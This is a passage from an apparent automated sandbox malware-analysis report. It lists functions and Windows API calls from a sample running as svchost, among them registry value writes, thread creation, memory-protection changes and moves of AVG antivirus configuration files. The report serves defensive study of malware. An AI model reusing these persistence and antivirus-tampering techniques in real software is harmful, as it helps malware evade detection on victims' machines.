                                                                                                                                                                                                                • Part of subcall function 02646980: memset.MSVCRT ref: 026469C0
                                                                                                                                                                                                                • Part of subcall function 02646980: lstrcpynA.KERNEL32(?,?,00000104), ref: 026469DD
                                                                                                                                                                                                                • Part of subcall function 02646980: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02646A4D
                                                                                                                                                                                                                • Part of subcall function 02646980: RegSetValueExA.ADVAPI32(?,75775DDDa,00000000,00000001,?,00000104), ref: 02646A6F
                                                                                                                                                                                                                • Part of subcall function 02646980: RegCloseKey.ADVAPI32(?), ref: 02646A7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02646AE4
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02646AE7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02646AF4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02646AF7
                                                                                                                                                                                                                • Part of subcall function 02646690: memset.MSVCRT ref: 026466B0
                                                                                                                                                                                                                • Part of subcall function 02646690: calloc.MSVCRT ref: 0264670F
                                                                                                                                                                                                                • Part of subcall function 02646690: exit.MSVCRT ref: 0264671F
                                                                                                                                                                                                                • Part of subcall function 02646690: calloc.MSVCRT ref: 02646729
                                                                                                                                                                                                                • Part of subcall function 02646690: exit.MSVCRT ref: 02646734
                                                                                                                                                                                                                • Part of subcall function 02646690: calloc.MSVCRT ref: 0264674F
                                                                                                                                                                                                                • Part of subcall function 02646690: exit.MSVCRT ref: 0264675C
                                                                                                                                                                                                                • Part of subcall function 02646690: calloc.MSVCRT ref: 02646766
                                                                                                                                                                                                                • Part of subcall function 02646690: exit.MSVCRT ref: 02646771
                                                                                                                                                                                                                • Part of subcall function 02646690: calloc.MSVCRT ref: 02646794
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: calloc$Heapexit$memset$Process$AdminCloseFreeOpenUserValidateValuelstrcpyn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1728208919-0
                                                                                                                                                                                                              • Opcode ID: 3d79c5ba620315c7ce3f6504aef41b5096c6d826872fb9672cfbfc8acd7ad150
                                                                                                                                                                                                              • Instruction ID: a7149374c9c0740dc70377cfa1cecbd712ddea3903e1e2197a7a6c5c1ded87ee
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d79c5ba620315c7ce3f6504aef41b5096c6d826872fb9672cfbfc8acd7ad150
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2F0C23198222967CB206EA2EC08B8F7A5DEF82726F01952AF501D2140CFB5D0D0CAE5
                                                                                                                                                                                                              Function 02647980 Relevance: 7.5, APIs: 5, Instructions: 20COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,02658E9D,?,?,?,?,?,?), ref: 02647987
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 02647992
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0264799A
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(00000000), ref: 026479A5
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 026479AC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$AdminCreateDirectoryFolderMakePathSystemUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1233776721-0
                                                                                                                                                                                                              • Opcode ID: 651f00ef99eacdf8cc65ab71b27f5edeea39ad8f3668ce60aa98e48d6427be04
                                                                                                                                                                                                              • Instruction ID: c2d4949f2199ec3ef7b0898f115d3feee8b0c3a149c1f95714fa7abc43cb5c31
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 651f00ef99eacdf8cc65ab71b27f5edeea39ad8f3668ce60aa98e48d6427be04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1ED01231A421107BD7231B31AC0C73E7B64BF49A05B8A1914F843E1240DF24C1519566
                                                                                                                                                                                                              Function 00402450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                              • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFolderMovePath
                                                                                                                                                                                                              • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                              • API String ID: 1404575960-1083204512
                                                                                                                                                                                                              • Opcode ID: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction ID: 6a3b38723654ace9b65cd78b9e90850702c138762b68f8666c7e3f81cfb55a8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35215EB45042448FC719DF14EA98B92BBE1FB89300F1581B9DA88A73B2D6B0D944CF98
                                                                                                                                                                                                              Function 02664980 Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7750FFB0,?,?,?,?,?,02657967,00000000,?,00000000), ref: 026649AD
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,02657967,?,?,?,?,?,02657967,00000000,?,00000000), ref: 026649CA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02657967,00000000,?,00000000), ref: 026649E2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,02657967,00000000), ref: 026649F3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3228293703-0
                                                                                                                                                                                                              • Opcode ID: b6db2f0daf620dc017121836d6f6cac7ccca689b316115633a8feabb7902f8d4
                                                                                                                                                                                                              • Instruction ID: bdc7adfd6e99a4fcdfd56f8615ee942b5fa4528fb33f0986019ec4387eddb6d5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6db2f0daf620dc017121836d6f6cac7ccca689b316115633a8feabb7902f8d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4411F1B1D41219ABCB10CF9AC8889FFFBFCFF98644F50825AE905A7200D7705655CBA0
                                                                                                                                                                                                              Function 02647620 Relevance: 6.0, APIs: 4, Instructions: 42fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,75775CE0,?,?,0265E2F9,00000000), ref: 02647638
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,0265E2F9,00000000), ref: 02647647
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000001,?,00000000,?,?,0265E2F9,00000000), ref: 02647659
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,?,0265E2F9,00000000), ref: 02647669
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3342219707-0
                                                                                                                                                                                                              • Opcode ID: 51547aba111065244b0ffe810ae56de501466ef7671b495b4ad5a55f6273af7f
                                                                                                                                                                                                              • Instruction ID: 780bf5224bc56ff914775c02bb773cacabf2453739e07e01b29db1a00d87c811
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51547aba111065244b0ffe810ae56de501466ef7671b495b4ad5a55f6273af7f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F06D71641208BFE7209E65DC89FEF7BADEB49780F504125FA01DA180DB709A80C6B9
                                                                                                                                                                                                              Function 026577C0 Relevance: 6.0, APIs: 4, Instructions: 27threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02656CA0,00000000,00000000,00000000), ref: 026577D4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 026577EC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 026577FD
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 02657805
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4233414108-0
                                                                                                                                                                                                              • Opcode ID: 5d07fe238518051dab84043dede53680f032b0f98ed17046223e70692c473013
                                                                                                                                                                                                              • Instruction ID: 60db20c114699aea4f4c8fe9b48c5f182bf1a8a5d5fd786d73c427c390b0dccc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d07fe238518051dab84043dede53680f032b0f98ed17046223e70692c473013
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5EE09B30AC6324B7F72287D0CD0EF6E7A6C9F00B05F910114FD01A51C0D7E46900C6A5
                                                                                                                                                                                                              Function 026541B0 Relevance: 6.0, APIs: 4, Instructions: 18memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,6F9690B0,02650C69), ref: 026541BE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026541C1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026541CE
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 026541D1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              • Opcode ID: 413a300b7a274e6f614fd74b1485e77051c3c32d1843bc37f4157a7d91f60c95
                                                                                                                                                                                                              • Instruction ID: f969d7acc86b1d6e8400dc9164ce7ae82e3deb2aec72641a0bd3edee157230c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 413a300b7a274e6f614fd74b1485e77051c3c32d1843bc37f4157a7d91f60c95
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDD0C76198516076D7702A766C0CF6F7D1CDFD5B51F575540F916A7184CF608090C5F1
                                                                                                                                                                                                              Function 02654A30 Relevance: 5.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02646C70: memset.MSVCRT ref: 02646CA1
                                                                                                                                                                                                                • Part of subcall function 02646C70: memset.MSVCRT ref: 02646CBF
                                                                                                                                                                                                                • Part of subcall function 02646C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02646CDB
                                                                                                                                                                                                                • Part of subcall function 02646C70: RegQueryValueExA.KERNEL32(?,75775DDDa,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02646D02
                                                                                                                                                                                                                • Part of subcall function 02646C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02646D7A
                                                                                                                                                                                                                • Part of subcall function 02646C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02646D81
                                                                                                                                                                                                                • Part of subcall function 02646C70: memset.MSVCRT ref: 02646D95
                                                                                                                                                                                                                • Part of subcall function 02646C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02646DAE
                                                                                                                                                                                                                • Part of subcall function 02646C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02646DBC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,76F90F10,00000000,0265A2D3), ref: 02654A88
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02654A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02654A98
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02654A9B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocCloseFreeOpenQueryValidateValuelstrcpyn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 789118668-0
                                                                                                                                                                                                              • Opcode ID: cfc0d1f7d36f693417eee41bc545a72cdf41b81e959d3cf8c059c2bcfc05db06
                                                                                                                                                                                                              • Instruction ID: 0c6c6ea06cfe4cb6c208d26216346c729ebd8d3b5b5530d9a4703c0106e2f997
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfc0d1f7d36f693417eee41bc545a72cdf41b81e959d3cf8c059c2bcfc05db06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D012471B8A1205ADB644E7AAD6073EBB9EDF82150F4D1299FC46C738CEF21CC809358
                                                                                                                                                                                                              Function 02668CB0 Relevance: 4.6, APIs: 3, Instructions: 74fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,?,00000000,?,?,02669223), ref: 02668CEF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                              • Opcode ID: 0dd971a67d660d92c9840a3567decdd3ea5ce5f843f588183f21525d1d29e230
                                                                                                                                                                                                              • Instruction ID: 14df515e94186e6571c2130fbd65f29100bb160ce58a6850a3a09d7a30e40550
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dd971a67d660d92c9840a3567decdd3ea5ce5f843f588183f21525d1d29e230
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B11E972A01344ABD7209E7DA8C87BEFBECEB45269F50057FE949C3240C7715C448660
                                                                                                                                                                                                              Function 02654170 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,02650BF7,02650BE3,?,02658A25,?,?,?), ref: 02654181
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 02654188
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654198
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocateProcessmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 983300431-0
                                                                                                                                                                                                              • Opcode ID: 1b6c2dafd760786dcea6d60a9ce8f0c9e3fe743a648a825c106ff42f7d4a3549
                                                                                                                                                                                                              • Instruction ID: 38bbe76bbf9b45ee51f7723f2a03d69a4d38d38930c22360b625d10f1cee705d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1b6c2dafd760786dcea6d60a9ce8f0c9e3fe743a648a825c106ff42f7d4a3549
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01E0CD7764152176DB21152A6C04B9F35199FC1631F164324FE05E63C0DF10C44941F1
                                                                                                                                                                                                              Function 0265A4F0 Relevance: 4.5, APIs: 3, Instructions: 24threadmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0265A4FE
                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000), ref: 0265A505
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(0265A660,00000008,00000000,0265A660), ref: 0265A51F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$CurrentPriorityProtectVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1494777729-0
                                                                                                                                                                                                              • Opcode ID: 590fcb7c490f2bbe3566d25d77a4cd4cec3b3b8df96233500ab4132acbd08b63
                                                                                                                                                                                                              • Instruction ID: 4e8b84fba880c99c618f9c1fcce7bc2c0f4b3526842a4ef15b7b56e3f5d27b18
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 590fcb7c490f2bbe3566d25d77a4cd4cec3b3b8df96233500ab4132acbd08b63
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CE065B6E40208EFCF00DFD8DC459ADB778FB48320F008649F955A7240C7749810CB60
                                                                                                                                                                                                              Function 0040219A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: v-@
                                                                                                                                                                                                              • API String ID: 3664257935-4190885519
                                                                                                                                                                                                              • Opcode ID: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction ID: 659d1c44b33988b11b994a6559d152e96ecfdb185b9268fc6ed29e1105b0769f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34D05E76E01629CBCB21DF94A5052AEF730FB44731F0043AADE247338083351C118AD5
                                                                                                                                                                                                              Function 02667490 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                              • String ID: bad pack level
                                                                                                                                                                                                              • API String ID: 2221118986-4081416248
                                                                                                                                                                                                              • Opcode ID: 48ea54d8184fc416c8d8669561325ee41c24a41370df15cd55b0c6372015aa81
                                                                                                                                                                                                              • Instruction ID: a2cae9453f32710c00ded83f4d690dd04cb524006e4529fc59a1cd1d68c49425
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48ea54d8184fc416c8d8669561325ee41c24a41370df15cd55b0c6372015aa81
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C631A2F5A007108AC321AFB9E8845ABF7E6FF46314B00493EE1AA96250D778B081CF53
                                                                                                                                                                                                              Function 02667770 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.MSVCRT(0001AF70,00022F70,00008000,0001AF70,0266757C), ref: 026677BF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                              • String ID: more < 2
                                                                                                                                                                                                              • API String ID: 3510742995-2484782096
                                                                                                                                                                                                              • Opcode ID: 01f4fa1902ab8181eb6e0e0f9ac9eb696ddfc2ca1dab74b2303f65eeab84f3a5
                                                                                                                                                                                                              • Instruction ID: 7320c1e6ed271df854ea4bb42bd87e1f6ab40e578243d492a4cfc66b504852d0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01f4fa1902ab8181eb6e0e0f9ac9eb696ddfc2ca1dab74b2303f65eeab84f3a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C33130B1610A008BD7259BB4C4487B7B3A6FF45328F144A3DD06B922D4E7786846CF43
                                                                                                                                                                                                              Function 02668ED0 Relevance: 3.1, APIs: 2, Instructions: 66fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,00000068,?,0266910E,00000068,00000000,00000000,00000000,00000011), ref: 02668EF6
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00004000,?,00000000,00000000,00000068,?,0266910E,00000068,00000000,00000000,00000000,00000011), ref: 02668F2C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
